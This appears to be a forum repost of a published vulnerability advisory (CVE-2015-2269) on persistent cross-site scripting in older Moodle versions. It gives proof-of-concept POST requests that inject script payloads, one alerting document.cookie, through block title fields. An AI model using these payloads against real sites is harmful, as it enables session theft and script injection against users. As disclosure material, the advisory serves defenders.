Aerosol Posted March 18, 2015 Report Posted March 18, 2015 Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site ScriptingVendor: Moodle Pty LtdProduct web page: https://www.moodle.orgAffected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9Summary: Moodle is a learning platform designed to provideeducators, administrators and learners with a single robust,secure and integrated system to create personalised learningenvironments.Desc: Moodle suffers from persistent XSS vulnerabilities. Inputpassed to the POST parameters 'config_title' and 'title' thruindex.php, are not properly sanitized allowing the attacker toexecute HTML or JS code into user's browser session on the affectedsite. Affected components: Blocks, Glossary, RSS and Tags.Tested on: nginx PHP/5.4.22Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2015-5236Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php[/url]Vendor Advisory ID: MSA-15-0013Vendor Advisory URL: [url]https://moodle.org/mod/forum/discuss.php?d=307383[/url]CVE ID: CVE-2015-2269CVE URL: [url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269[/url]09.02.2015--Random Glossary Entry---------------------POST [url]http://WEB/my/index.php[/url] HTTP/1.1_qf__block_glossary_random_edit_form=1bui_contexts=0bui_defaultregion=side-prebui_defaultweight=4bui_editid=304bui_editingatfrontpage=0bui_pagetypepattern=my-indexbui_parentcontextid=411bui_region=side-prebui_subpagepattern=%@NULL@%bui_visible=1bui_weight=4config_addentry=testconfig_invisible=test2config_refresh=0config_showconcept=1config_title=" onmouseover=prompt("XSS1") >config_type=0config_viewglossary=test3mform_isexpanded_id_configheader=1mform_isexpanded_id_onthispage=0mform_isexpanded_id_whereheader=0sesskey=S8TXvxdEKFsubmitbutton=Save changesRemote RSS Feeds----------------POST [url]http://WEB/my/index.php[/url] HTTP/1.1_qf__block_rss_client_edit_form=1bui_contexts=0bui_defaultregion=side-prebui_defaultweight=4bui_editid=312bui_editingatfrontpage=0bui_pagetypepattern=my-indexbui_parentcontextid=411bui_region=side-prebui_subpagepattern=%@NULL@%bui_visible=1bui_weight=4config_block_rss_client_show_channel_image=0config_block_rss_client_show_channel_link=0config_display_description=0config_rssid=_qf__force_multiselect_submissionconfig_rssid[]=3config_shownumentries=11config_title=" onmouseover=prompt("XSS2") >mform_isexpanded_id_configheader=1mform_isexpanded_id_onthispage=0mform_isexpanded_id_whereheader=0sesskey=S8TXvxdEKFsubmitbutton=Save changesTags----POST [url]http://WEB/my/index.php[/url] HTTP/1.1_qf__block_tags_edit_form=1bui_contexts=0bui_defaultregion=side-prebui_defaultweight=4bui_editid=313bui_editingatfrontpage=0bui_pagetypepattern=my-indexbui_parentcontextid=411bui_region=side-prebui_subpagepattern=%@NULL@%bui_visible=1bui_weight=4config_numberoftags=80config_tagtype=config_title=Tags" onmouseover=prompt("XSS3") >mform_isexpanded_id_configheader=1mform_isexpanded_id_onthispage=0mform_isexpanded_id_whereheader=0sesskey=S8TXvxdEKFsubmitbutton=Save changesOlder not supported versions----------------------------POST [url]http://WEB/blog/index.php[/url] HTTP/1.1blockaction=configfilterselect=1343filtertype=userinstanceid=4992numberoftags=20sesskey=0QCG5LQz0Qsort=nametimewithin=90title=ZSL"><script>alert(document.cookie);</script>Source Quote